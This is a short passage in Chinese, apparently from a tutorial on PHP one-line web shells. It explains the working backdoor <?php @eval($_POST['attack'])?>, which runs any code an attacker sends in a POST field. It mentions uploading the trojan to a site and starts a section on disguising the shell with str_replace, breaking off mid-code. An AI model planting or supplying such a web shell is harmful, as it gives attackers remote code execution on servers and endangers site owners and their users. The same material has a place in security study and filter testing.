一、最基本的一句话 @ 表示忽略报错 $_POST 表示使用post的方式提交变量 attack代表为变量名 <?php @eval($_POST['attack'])?> 上传木马使用实例: 二、一句话变形 1、str_replace函数 查找字符串中的abc,并用空串替换 <?php $a